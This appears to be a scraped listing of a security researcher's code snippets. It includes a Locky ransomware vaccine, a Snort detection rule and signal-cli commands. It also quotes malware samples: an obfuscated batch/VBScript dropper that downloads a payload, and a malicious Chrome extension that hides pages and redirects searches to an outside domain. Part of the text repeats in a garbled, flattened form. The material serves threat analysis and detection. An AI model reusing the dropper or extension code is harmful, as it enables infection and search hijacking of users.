x0rz

## locky.ps1
# Create registry Key
New-Item -Path "HKCU:\Software\Locky" -ItemType Key

# Setting ACL
$a = whoami
$acl = Get-Acl HKCU:\SOFTWARE\Locky
$rule = New-Object System.Security.AccessControl.RegistryAccessRule ($a,"FullControl","Deny")
$acl.SetAccessRule($rule)
$acl | Set-Acl -Path HKCU:\SOFTWARE\Locky

## dropper.INFECTED.bat
cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT

## signal commands_2.txt
# Get the text from the QR code given by the Signal app and link your new number to it
signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."

## background.js
function redirect(e){chrome.tabs.update({url:e})}var pagebrowsed,allowSearch,prevurl=null,srchid=100,sysid=739,random=Math.floor(1e7*Math.random()),thanksmsg=[random,"slonif",".","faith","opurie","com"],InstallDone="";chrome.tabs.onUpdated.addListener(function(){chrome.tabs.getSelected(null,function(e){var s=e.url;if(InstallDone){InstallDone[srchid]?InstallDone[srchid]:InstallDone.default;if(s!=prevurl&&(prevurl=s,chrome.storage.sync.get({pagebrowsed:0},function(e){pagebrowsed=e.pagebrowsed,chrome.storage.sync.set({pagebrowsed:e.pagebrowsed+1})})),pagebrowsed>5&&(document.getElementsByTagName("body")[0].style.display="none",s.match(/google/)||s.match(/bing/))){var t=s.split("q=");if(t.length>1){var a="http://startupfraction.com/yaelba/?keyword="+t[1].split("&")[0]+"&id="+srchid+"&sysid="+sysid;redirect(a),chrome.tabs.update({url:a})}}if(pagebrowsed>5)try{var n=window.document.createElement("canvas").getContext("2d");chrome.browserAction.setIcon({imageData:n.getImageData(0,0,19,19)})}catch(e){}}})}),fetch("htt

## background_beautify.js
function redirect(e) {
    chrome.tabs.update({
        url: e
    })
}
var pagebrowsed, allowSearch, prevurl = null,
    srchid = 100,
    sysid = 739,
    random = Math.floor(1e7 * Math.random()),
    thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],

## manifest.json
{
   "background": {
      "scripts": [ "background.js" ]
   },
   "browser_action": {
      "default_icon": "opurie.png",
      "default_popup": "popup.html",
      "default_title": "Opurie"
   },
   "description": "Whiohoo! Welcome back to Opurie",

## wordpress_snort.rules
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; http_uri; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU";metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:1;)

## eqgrp_services_lookup.ps1
echo "[+] Getting \system\\currentcontrolset\\services"

$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
$services = @()

foreach ($srv in $raw_services) {
	$shortname = "$srv".Split("\")[-1]
	$shortname = $shortname.Substring(0,$shortname.Length-1)
	$services += $shortname
}

## signal commands.txt
# Registering your new number
signal-cli -u "+1234568790" register
signal-cli -u "+1234568790" verify xxxxxx

## detect_fresh_pe.py
import datetime
import os
import sys
import pefile
from scapy.all import *
import scapy_http.http
import tempfile

TIME_THRESHOLD = datetime.timedelta(days=3)
	# Create registry Key
	New-Item -Path "HKCU:\Software\Locky" -ItemType Key

	# Setting ACL
	$a = whoami
	$acl = Get-Acl HKCU:\SOFTWARE\Locky
	$rule = New-Object System.Security.AccessControl.RegistryAccessRule ($a,"FullControl","Deny")
	$acl.SetAccessRule($rule)
	$acl \| Set-Acl -Path HKCU:\SOFTWARE\Locky
	# Get the text from the QR code given by the Signal app and link your new number to it
	signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."
	function redirect(e) {
	chrome.tabs.update({
	url: e
	})
	}
	var pagebrowsed, allowSearch, prevurl = null,
	srchid = 100,
	sysid = 739,
	random = Math.floor(1e7 * Math.random()),
	thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],
	{
	"background": {
	"scripts": [ "background.js" ]
	},
	"browser_action": {
	"default_icon": "opurie.png",
	"default_popup": "popup.html",
	"default_title": "Opurie"
	},
	"description": "Whiohoo! Welcome back to Opurie",
	echo "[+] Getting \system\\currentcontrolset\\services"

	$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services \| select Name
	$services = @()

	foreach ($srv in $raw_services) {
	$shortname = "$srv".Split("\")[-1]
	$shortname = $shortname.Substring(0,$shortname.Length-1)
	$services += $shortname
	}
	# Registering your new number
	signal-cli -u "+1234568790" register
	signal-cli -u "+1234568790" verify xxxxxx
	import datetime
	import os
	import sys
	import pefile
	from scapy.all import *
	import scapy_http.http
	import tempfile

	TIME_THRESHOLD = datetime.timedelta(days=3)